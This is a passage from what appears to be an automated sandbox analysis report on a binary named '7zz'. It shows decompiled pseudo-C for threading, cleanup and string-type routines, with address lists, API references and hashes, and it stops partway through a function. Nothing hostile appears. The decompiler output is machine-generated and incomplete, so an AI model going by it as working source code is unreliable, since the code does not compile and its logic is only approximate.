							L00467C60(_t411 - 0x50);
							 *(_t411 - 0x38) =  *(_t411 - 0x38) & 0x00000000;
							 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
							 *(_t411 - 4) = 1;
							 *(_t411 - 0x34) = 1;
							if(_t389 <= 0) {
								L50:
								if(_t389 <= 1 || _t389 <= 0) {
									L54:
									_t399 = 0;
									if( *(_t411 - 0x38) == 0) {
										 *(_t411 - 0x58) = 0;
										E00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
										__eflags = _t389;
										 *((intOrPtr*)(_t411 - 0x68)) = 0;
										 *((intOrPtr*)(_t411 - 0x64)) = 0;
										 *((intOrPtr*)(_t411 - 0x60)) = 0;
										 *((intOrPtr*)(_t411 - 0x5c)) = 0;
										 *(_t411 - 0x58) = 1;
										if(_t389 <= 0) {
											L59:
											_t247 =  *((intOrPtr*)( *( *(_t411 + 8))))(_t411 - 0x88, 1);
											__eflags = _t247 - _t399;
											 *(_t411 - 0x2c) = _t247;
											if(_t247 == _t399) {
												 *(_t411 - 0x34) =  *(_t411 - 0x34) & 0x00000000;
												_t249 =  *(_t411 - 0x24) * _t389;
												__eflags = _t389 - _t399;
												 *(_t411 - 0x38) = _t399;
												 *(_t411 - 0x14) = _t249;
												 *(_t411 - 0x10) = _t399;
												if(_t389 <= _t399) {
													L78:
													__eflags = _t249 - 1;
													 *(_t411 - 0x14) = _t399;
													if(_t249 <= 1) {
														L94:
														_t400 =  *(_t411 - 0x38);
														__eflags = _t400;
														if(_t400 == 0) {
															E00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
															_t399 = 0;
															 *((intOrPtr*)(_t411 - 0x68)) = 0;
															 *((intOrPtr*)(_t411 - 0x64)) = 0;
															 *((intOrPtr*)(_t411 - 0x60)) = 0;
															 *((intOrPtr*)(_t411 - 0x5c)) = 0;
															__eflags = _t389;
															 *(_t411 - 0x58) =  *(_t323 + 0x1c) *  *(_t411 - 0x24);
															if(_t389 <= 0) {
																L101:
																_t391 =  *(_t411 + 8);
																_t324 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, _t399);
																__eflags = _t324 - _t399;
																if(_t324 == _t399) {
																	_t392 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, 1);
																	__eflags = _t392 - _t399;
																	_push(_t411 - 0x50);
																	if(_t392 == _t399) {
																		DeleteCriticalSection();
																		_t341 =  *(_t411 - 0x18);
																		 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																		__eflags =  *(_t411 - 0x18) - _t399;
																		if( *(_t411 - 0x18) != _t399) {
																			E0041415B(_t341, _t392, _t411, 3);
																		}
																		_t242 = 0;
																		L113:
																		 *[fs:0x0] =  *((intOrPtr*)(_t411 - 0xc));
																		return _t242;
																	}
																	L106:
																	DeleteCriticalSection();
																	_t342 =  *(_t411 - 0x18);
																	 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																	if( *(_t411 - 0x18) != _t399) {
																		E0041415B(_t342, _t392, _t411, 3);
																	}
																	_t242 = _t392;
																	goto L113;
																}
																DeleteCriticalSection(_t411 - 0x50);
																_t343 =  *(_t411 - 0x18);
																 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																__eflags =  *(_t411 - 0x18) - _t399;
																if( *(_t411 - 0x18) != _t399) {
																	E0041415B(_t343, _t391, _t411, 3);
																}
																_t242 = _t324;
																goto L113;
															}
															_t262 = _t323 + 0x68;
															do {
																 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t262 - 4));
																asm("adc [ebp-0x64], esi");
																 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t262;
																asm("adc [ebp-0x5c], esi");
																_t262 = _t262 + 0x84;
																_t389 = _t389 - 1;
																__eflags = _t389;
															} while (_t389 != 0);
															goto L101;
														}
														L95:
														DeleteCriticalSection(_t411 - 0x50);
														_t346 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t346, _t389, _t411, 3);
														}
														_t242 = _t400;
														goto L113;
													}
													__eflags = _t389;
													if(_t389 <= 0) {
														goto L94;
													}
													 *(_t411 - 0x20) = _t323;
													 *(_t411 - 0x1c) = _t389;
													do {
														__eflags =  *(_t411 - 0x24);
														if( *(_t411 - 0x24) <= 0) {
															goto L86;
														}
														_t401 = 0x4c;
														 *(_t411 - 0x28) =  *(_t411 - 0x24);
														do {
															E00467AC0( *((intOrPtr*)( *(_t411 - 0x20) + _t401 - 0x4c)));
															_t269 =  *( *(_t411 - 0x20) + _t401);
															__eflags = _t269;
															if(_t269 != 0) {
																 *(_t411 - 0x14) = _t269;
															}
															_t401 = _t401 + 4;
															_t185 = _t411 - 0x28;
															 *_t185 =  *(_t411 - 0x28) - 1;
															__eflags =  *_t185;
														} while ( *_t185 != 0);
														L86:
														 *(_t411 - 0x20) =  *(_t411 - 0x20) + 0x84;
														_t189 = _t411 - 0x1c;
														 *_t189 =  *(_t411 - 0x1c) - 1;
														__eflags =  *_t189;
													} while ( *_t189 != 0);
													__eflags =  *(_t411 - 0x14);
													if( *(_t411 - 0x14) == 0) {
														goto L94;
													}
													DeleteCriticalSection(_t411 - 0x50);
													_t348 =  *(_t411 - 0x18);
													 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
													__eflags =  *(_t411 - 0x18);
													if( *(_t411 - 0x18) != 0) {
														E0041415B(_t348, _t389, _t411, 3);
													}
													_t242 =  *(_t411 - 0x14);
													goto L113;
												} else {
													goto L64;
												}
												do {
													L64:
													_t404 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
													_t389 = 0;
													_t383 = 0x4000000 %  *(_t404 + 0x64);
													__eflags =  *(_t411 - 0x10);
													 *((intOrPtr*)(_t404 + 0x1c)) = 0x4000000 /  *(_t404 + 0x64) + 2;
													if( *(_t411 - 0x10) == 0) {
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x4c) =  *(_t411 + 8);
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x40) =  *(_t411 - 0x14);
														__eflags =  *((intOrPtr*)(_t404 + 0xc)) + 0x10;
														E00414885( *((intOrPtr*)(_t404 + 0xc)) + 0x10, _t383);
													}
													__eflags =  *(_t411 - 0x14) - 1;
													if( *(_t411 - 0x14) <= 1) {
														_push(_t389);
														_t400 = L00413EF3(_t404);
														__eflags = _t400 - _t389;
														if(_t400 != _t389) {
															goto L95;
														}
													} else {
														__eflags =  *(_t411 - 0x24) - _t389;
														if( *(_t411 - 0x24) <= _t389) {
															goto L76;
														}
														_t326 =  *(_t411 - 0x10) *  *(_t411 - 0x24);
														__eflags = _t326;
														while(1) {
															__eflags =  *(_t411 - 0x10);
															if( *(_t411 - 0x10) == 0) {
																__eflags = _t389;
																if(_t389 == 0) {
																	_push(1);
																	_pop(0);
																}
															}
															_t280 = (_t389 << 4) + _t404 + 0x24;
															 *(_t280 + 8) = (_t326 + _t389) * 0x00000150 & 0x000007ff;
															 *((char*)(_t280 + 0xc)) = 0;
															 *(_t280 + 4) = _t389;
															 *_t280 = _t404;
															_t281 = E00467AD0(_t404 + _t389 * 4, E004148ED, _t280);
															__eflags = _t281;
															 *(_t411 - 0x2c) = _t281;
															if(_t281 != 0) {
																break;
															}
															_t389 = _t389 + 1;
															__eflags = _t389 -  *(_t411 - 0x24);
															if(_t389 <  *(_t411 - 0x24)) {
																continue;
															}
															goto L76;
														}
														DeleteCriticalSection(_t411 - 0x50);
														_t352 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t352, _t389, _t411, 3);
														}
														_t242 =  *(_t411 - 0x2c);
														goto L113;
													}
													L76:
													 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
													__eflags =  *(_t411 - 0x10) -  *(_t411 - 0x1c);
												} while ( *(_t411 - 0x10) <  *(_t411 - 0x1c));
												_t323 =  *(_t411 - 0x20);
												_t249 =  *(_t411 - 0x14);
												_t389 =  *(_t411 - 0x1c);
												_t399 = 0;
												__eflags = 0;
												goto L78;
											}
											DeleteCriticalSection(_t411 - 0x50);
											_t357 =  *(_t411 - 0x18);
											 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
											__eflags =  *(_t411 - 0x18) - _t399;
											if( *(_t411 - 0x18) != _t399) {
												E0041415B(_t357, _t389, _t411, 3);
											}
											_t242 =  *(_t411 - 0x2c);
											goto L113;
										}
										_t289 = _t323 + 0x68;
										 *(_t411 - 0x14) = _t389;
										do {
											 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t289 - 4));
											asm("adc [ebp-0x64], esi");
											 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t289;
											asm("adc [ebp-0x5c], esi");
											_t289 = _t289 + 0x84;
											_t118 = _t411 - 0x14;
											 *_t118 =  *(_t411 - 0x14) - 1;
											__eflags =  *_t118;
										} while ( *_t118 != 0);
										goto L59;
									}
									_t392 =  *(_t411 - 0x38);
									_push(_t411 - 0x50);
									goto L106;
								} else {
									_t405 = _t323;
									 *(_t411 - 0x14) = _t389;
									do {
										E00467AC0( *_t405);
										_t405 = _t405 + 0x84;
										_t98 = _t411 - 0x14;
										 *_t98 =  *(_t411 - 0x14) - 1;
									} while ( *_t98 != 0);
									goto L54;
								}
							} else {
								goto L37;
							}
							do {
								L37:
								 *(_t411 - 0x14) = 2;
								_t408 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
								_t393 = _t408 + 0xc;
								_t327 = _t393;
								do {
									_push(0x50);
									_t292 = E004079F2();
									if(_t292 == 0) {
										_t292 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t292 + 4)) = 0;
										 *((intOrPtr*)(_t292 + 0x40)) = 0;
										 *((intOrPtr*)(_t292 + 0x4c)) = 0;
										 *_t292 = 0x47aaf4;
									}
									 *_t327 = _t292;
									E0040C9B4(_t327 + 8, _t292);
									_t294 =  *_t327;
									_t327 = _t327 + 4;
									_t81 = _t411 - 0x14;
									 *_t81 =  *(_t411 - 0x14) - 1;
									 *((intOrPtr*)(_t294 + 8)) = _t411 - 0x50;
								} while ( *_t81 != 0);
								if( *(_t411 - 0x10) == 0) {
									 *( *_t393 + 0x4c) =  *(_t411 + 8);
									 *( *_t393 + 0x40) =  *(_t411 - 0x1c);
									E00414885( *_t393 + 0x10, _t378);
								}
								_t389 =  *(_t411 - 0x1c);
								if(_t389 <= 1) {
									_t295 = L00413E35(_t408);
								} else {
									_t378 = E004148B5;
									 *(_t408 + 0x20) =  *(_t411 - 0x10) * 0x00000150 & 0x000007ff;
									_t295 = E00467AD0(_t408, E004148B5, _t408);
								}
								_t400 = _t295;
								if(_t400 != 0) {
									goto L95;
								}
								 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							} while ( *(_t411 - 0x10) < _t389);
							_t323 =  *(_t411 - 0x20);
							_t389 =  *(_t411 - 0x1c);
							goto L50;
						}
						_t409 = _t323;
						while(1) {
							_push(_t411 - 0x94);
							_push( *((intOrPtr*)(_t411 - 0x8c)));
							_push( *(_t411 - 0x2c));
							_t303 = E00413A0D(_t409, _t430);
							 *(_t411 - 0x30) = _t303;
							if(_t303 != 0) {
								break;
							}
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t409 = _t409 + 0x84;
							if( *(_t411 - 0x10) < _t389) {
								continue;
							}
							goto L36;
						}
						_t372 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t372, _t389, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t410 = _t398 + 8;
					_t422 = _t410;
					while(1) {
						_push(0);
						asm("sbb eax, eax");
						_t378 = 1;
						_push(0x30101);
						 *(_t410 + 0x54) =  !( ~( *(_t411 - 0x10))) &  *(_t411 + 8);
						_t309 = E0040C964(_t410, 1, _t422);
						 *(_t411 - 0x14) = _t309;
						if(_t309 != 0) {
							break;
						}
						if( *_t410 == _t309) {
							_t375 =  *(_t411 - 0x18);
							 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
							__eflags =  *(_t411 - 0x18) - _t309;
							L30:
							if(__eflags != 0) {
								E0041415B(_t375, 0x30101, _t411, 3);
							}
							_t242 = 0x80004001;
							goto L113;
						}
						_t425 =  *(_t411 - 0x24) - _t309;
						 *(_t411 - 0x14) = _t309;
						if( *(_t411 - 0x24) <= _t309) {
							L15:
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t410 = _t410 + 0x84;
							if( *(_t411 - 0x10) <  *(_t411 - 0x1c)) {
								continue;
							}
							_t389 =  *(_t411 - 0x1c);
							goto L17;
						}
						 *(_t411 - 0x28) = _t410 + 0x3c;
						while(1) {
							_push(0);
							_t378 = 0;
							_push(0x30101);
							_t314 = E0040C964( *(_t411 - 0x28), 0, _t425);
							 *(_t411 - 0x30) = _t314;
							if(_t314 != 0) {
								break;
							}
							if( *( *(_t411 - 0x28)) == 0) {
								_t375 =  *(_t411 - 0x18);
								 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
								__eflags =  *(_t411 - 0x18);
								goto L30;
							}
							 *(_t411 - 0x14) =  *(_t411 - 0x14) + 1;
							 *(_t411 - 0x28) =  *(_t411 - 0x28) + 4;
							if( *(_t411 - 0x14) <  *(_t411 - 0x24)) {
								continue;
							}
							goto L15;
						}
						_t377 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t377, 0x30101, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t374 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
					__eflags =  *(_t411 - 0x18);
					if( *(_t411 - 0x18) != 0) {
						E0041415B(_t374, 0x30101, _t411, 3);
					}
					_t242 =  *(_t411 - 0x14);
				}
			}








































                                                                      0x00414269
                                                                      0x00414269
                                                                      0x0041426e
                                                                      0x0041427e
                                                                      0x0041427f
                                                                      0x00414284
                                                                      0x0041428a
                                                                      0x00414292
                                                                      0x0041428c
                                                                      0x0041428e
                                                                      0x0041428e
                                                                      0x004142a2
                                                                      0x004142a5
                                                                      0x004142a8
                                                                      0x00414857
                                                                      0x004142c2
                                                                      0x004142c2
                                                                      0x004142c6
                                                                      0x004142cb
                                                                      0x004142ce
                                                                      0x004142d2
                                                                      0x004142d6
                                                                      0x004142da
                                                                      0x004142dd
                                                                      0x0041436e
                                                                      0x0041436e
                                                                      0x00414372
                                                                      0x0041437c
                                                                      0x0041437e
                                                                      0x00414388
                                                                      0x00414433
                                                                      0x00414436
                                                                      0x0041443b
                                                                      0x0041443f
                                                                      0x00414445
                                                                      0x00414449
                                                                      0x0041444d
                                                                      0x00414512
                                                                      0x00414515
                                                                      0x00414532
                                                                      0x00414532
                                                                      0x00414537
                                                                      0x00414545
                                                                      0x00414554
                                                                      0x00414559
                                                                      0x0041455b
                                                                      0x0041455e
                                                                      0x00414561
                                                                      0x00414564
                                                                      0x00414567
                                                                      0x0041456e
                                                                      0x00414591
                                                                      0x0041459f
                                                                      0x004145a1
                                                                      0x004145a3
                                                                      0x004145a6
                                                                      0x004145cf
                                                                      0x004145d3
                                                                      0x004145d6
                                                                      0x004145d8
                                                                      0x004145db
                                                                      0x004145de
                                                                      0x004145e1
                                                                      0x004146b6
                                                                      0x004146b6
                                                                      0x004146b9
                                                                      0x004146bc
                                                                      0x0041475a
                                                                      0x0041475a
                                                                      0x0041475d
                                                                      0x0041475f
                                                                      0x00414790
                                                                      0x00414795
                                                                      0x00414797
                                                                      0x0041479a
                                                                      0x0041479d
                                                                      0x004147a0
                                                                      0x004147aa
                                                                      0x004147ac
                                                                      0x004147af
                                                                      0x004147cd
                                                                      0x004147cd
                                                                      0x004147df
                                                                      0x004147e1
                                                                      0x004147e3
                                                                      0x00414815
                                                                      0x0041481a
                                                                      0x0041481c
                                                                      0x0041481d
                                                                      0x0041483b
                                                                      0x00414841
                                                                      0x00414844
                                                                      0x00414848
                                                                      0x0041484a
                                                                      0x0041484e
                                                                      0x0041484e
                                                                      0x00414853
                                                                      0x0041485c
                                                                      0x00414862
                                                                      0x0041486a
                                                                      0x0041486a
                                                                      0x0041481f
                                                                      0x0041481f
                                                                      0x00414825
                                                                      0x00414828
                                                                      0x0041482e
                                                                      0x00414832
                                                                      0x00414832
                                                                      0x00414837
                                                                      0x00000000
                                                                      0x00414837
                                                                      0x004147e9
                                                                      0x004147ef
                                                                      0x004147f2
                                                                      0x004147f6
                                                                      0x004147f8
                                                                      0x004147fc
                                                                      0x004147fc
                                                                      0x00414801
                                                                      0x00000000
                                                                      0x00414801
                                                                      0x004147b1
                                                                      0x004147b4
                                                                      0x004147b7
                                                                      0x004147ba
                                                                      0x004147bf
                                                                      0x004147c2
                                                                      0x004147c5
                                                                      0x004147ca
                                                                      0x004147ca
                                                                      0x004147ca
                                                                      0x00000000
                                                                      0x004147b4
                                                                      0x00414761
                                                                      0x00414765
                                                                      0x0041476b
                                                                      0x0041476e
                                                                      0x00414772
                                                                      0x00414774
                                                                      0x00414778
                                                                      0x00414778
                                                                      0x0041477d
                                                                      0x00000000
                                                                      0x0041477d
                                                                      0x004146c2
                                                                      0x004146c4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004146ca
                                                                      0x004146cd
                                                                      0x004146d0
                                                                      0x004146d0
                                                                      0x004146d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004146db
                                                                      0x004146dc
                                                                      0x004146df
                                                                      0x004146e6
                                                                      0x004146ee
                                                                      0x004146f1
                                                                      0x004146f3
                                                                      0x004146f5
                                                                      0x004146f5
                                                                      0x004146f8
                                                                      0x004146fb
                                                                      0x004146fb
                                                                      0x004146fb
                                                                      0x004146fb
                                                                      0x00414700
                                                                      0x00414700
                                                                      0x00414707
                                                                      0x00414707
                                                                      0x00414707
                                                                      0x00414707
                                                                      0x0041470c
                                                                      0x00414710
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414716
                                                                      0x0041471c
                                                                      0x0041471f
                                                                      0x00414723
                                                                      0x00414725
                                                                      0x00414729
                                                                      0x00414729
                                                                      0x0041472e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004145e7
                                                                      0x004145e7
                                                                      0x004145f5
                                                                      0x004145fa
                                                                      0x004145fc
                                                                      0x00414601
                                                                      0x00414604
                                                                      0x00414607
                                                                      0x0041460f
                                                                      0x00414618
                                                                      0x0041461e
                                                                      0x00414621
                                                                      0x00414621
                                                                      0x00414626
                                                                      0x0041462a
                                                                      0x0041468a
                                                                      0x00414692
                                                                      0x00414694
                                                                      0x00414696
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041462c
                                                                      0x0041462c
                                                                      0x0041462f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414634
                                                                      0x00414634
                                                                      0x00414638
                                                                      0x0041463a
                                                                      0x0041463d
                                                                      0x0041463f
                                                                      0x00414641
                                                                      0x00414643
                                                                      0x00414645
                                                                      0x00414645
                                                                      0x00414641
                                                                      0x0041465a
                                                                      0x0041465f
                                                                      0x00414662
                                                                      0x0041466d
                                                                      0x00414670
                                                                      0x00414672
                                                                      0x00414677
                                                                      0x00414679
                                                                      0x0041467c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414682
                                                                      0x00414683
                                                                      0x00414686
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414688
                                                                      0x0041473a
                                                                      0x00414740
                                                                      0x00414743
                                                                      0x00414747
                                                                      0x00414749
                                                                      0x0041474d
                                                                      0x0041474d
                                                                      0x00414752
                                                                      0x00000000
                                                                      0x00414752
                                                                      0x0041469c
                                                                      0x0041469c
                                                                      0x004146a2
                                                                      0x004146a2
                                                                      0x004146ab
                                                                      0x004146ae
                                                                      0x004146b1
                                                                      0x004146b4
                                                                      0x004146b4
                                                                      0x00000000
                                                                      0x004146b4
                                                                      0x004145ac
                                                                      0x004145b2
                                                                      0x004145b5
                                                                      0x004145b9
                                                                      0x004145bb
                                                                      0x004145bf
                                                                      0x004145bf
                                                                      0x004145c4
                                                                      0x00000000
                                                                      0x004145c4
                                                                      0x00414570
                                                                      0x00414573
                                                                      0x00414576
                                                                      0x00414579
                                                                      0x0041457c
                                                                      0x00414581
                                                                      0x00414584
                                                                      0x00414587
                                                                      0x0041458c
                                                                      0x0041458c
                                                                      0x0041458c
                                                                      0x0041458c
                                                                      0x00000000
                                                                      0x00414576
                                                                      0x00414539
                                                                      0x0041453f
                                                                      0x00000000
                                                                      0x0041451b
                                                                      0x0041451b
                                                                      0x0041451d
                                                                      0x00414520
                                                                      0x00414522
                                                                      0x00414527
                                                                      0x0041452d
                                                                      0x0041452d
                                                                      0x0041452d
                                                                      0x00000000
                                                                      0x00414520
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414453
                                                                      0x00414453
                                                                      0x00414456
                                                                      0x00414463
                                                                      0x00414466
                                                                      0x00414469
                                                                      0x0041446b
                                                                      0x0041446b
                                                                      0x0041446d
                                                                      0x00414475
                                                                      0x0041448a
                                                                      0x0041448a
                                                                      0x00414477
                                                                      0x00414479
                                                                      0x0041447c
                                                                      0x0041447f
                                                                      0x00414482
                                                                      0x00414482
                                                                      0x00414490
                                                                      0x00414492
                                                                      0x00414497
                                                                      0x0041449c
                                                                      0x0041449f
                                                                      0x0041449f
                                                                      0x004144a2
                                                                      0x004144a2
                                                                      0x004144ab
                                                                      0x004144b2
                                                                      0x004144ba
                                                                      0x004144c2
                                                                      0x004144c2
                                                                      0x004144c7
                                                                      0x004144cd
                                                                      0x004144f1
                                                                      0x004144cf
                                                                      0x004144de
                                                                      0x004144e5
                                                                      0x004144e8
                                                                      0x004144e8
                                                                      0x004144f6
                                                                      0x004144fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414500
                                                                      0x00414503
                                                                      0x0041450c
                                                                      0x0041450f
                                                                      0x00000000
                                                                      0x0041450f
                                                                      0x0041438e
                                                                      0x00414390
                                                                      0x00414398
                                                                      0x00414399
                                                                      0x0041439f
                                                                      0x004143a2
                                                                      0x004143a9
                                                                      0x004143ac
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004143ae
                                                                      0x004143b1
                                                                      0x004143ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004143bc
                                                                      0x00414419
                                                                      0x0041441c
                                                                      0x00414420
                                                                      0x00414422
                                                                      0x00414426
                                                                      0x00414426
                                                                      0x0041442b
                                                                      0x00000000
                                                                      0x0041442b
                                                                      0x004142e3
                                                                      0x004142e3
                                                                      0x004142eb
                                                                      0x004142ee
                                                                      0x004142f2
                                                                      0x004142f4
                                                                      0x004142fd
                                                                      0x004142fe
                                                                      0x00414301
                                                                      0x00414308
                                                                      0x0041430b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414313
                                                                      0x004143d8
                                                                      0x004143db
                                                                      0x004143df
                                                                      0x00414406
                                                                      0x00414406
                                                                      0x0041440a
                                                                      0x0041440a
                                                                      0x0041440f
                                                                      0x00000000
                                                                      0x0041440f
                                                                      0x00414319
                                                                      0x0041431c
                                                                      0x0041431f
                                                                      0x0041435a
                                                                      0x0041435a
                                                                      0x0041435d
                                                                      0x00414369
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041436b
                                                                      0x00000000
                                                                      0x0041436b
                                                                      0x00414324
                                                                      0x00414327
                                                                      0x0041432a
                                                                      0x0041432c
                                                                      0x0041432e
                                                                      0x0041432f
                                                                      0x00414336
                                                                      0x00414339
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414345
                                                                      0x004143fd
                                                                      0x00414400
                                                                      0x00414404
                                                                      0x00000000
                                                                      0x00414404
                                                                      0x0041434b
                                                                      0x0041434e
                                                                      0x00414358
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414358
                                                                      0x004143e3
                                                                      0x004143e6
                                                                      0x004143ea
                                                                      0x004143ec
                                                                      0x004143f0
                                                                      0x004143f0
                                                                      0x004143f5
                                                                      0x00000000
                                                                      0x004143f5
                                                                      0x004143be
                                                                      0x004143c1
                                                                      0x004143c5
                                                                      0x004143c7
                                                                      0x004143cb
                                                                      0x004143cb
                                                                      0x004143d0
                                                                      0x004143d0

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0041426E
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0041481F
                                                                        • Part of subcall function 00413E35: __EH_prolog.LIBCMT ref: 00413E3A
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 004145AC
                                                                        • Part of subcall function 00413EF3: __EH_prolog.LIBCMT ref: 00413EF8
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00414716
                                                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0041473A
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00414765
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 004147E9
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0041483B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDeleteSection$H_prolog
                                                                      • String ID:
                                                                      • API String ID: 267298877-0
                                                                      • Opcode ID: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
                                                                      • Instruction ID: c24d3815df71a14f5bbf7c8d066a825158e8e708a592f674f2395a742420ece0
                                                                      • Opcode Fuzzy Hash: 13d5c9578ffa9f24051f66a8e432b211ca4e975802d1602c744c2f562538c110
                                                                      • Instruction Fuzzy Hash: 8C125A31E002199FDF14DF94C981AEEB7B5BF88314F14416AE529AB380D7789A81CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00472375 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 78%
                                                                      			E00472375(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x47cd40);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x4938a4; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x493880; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x496224
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0046CC80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0046CCB0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x493870; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x47cd24, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x47cd20, _t61,  &_v32) == 0) {
							L18:
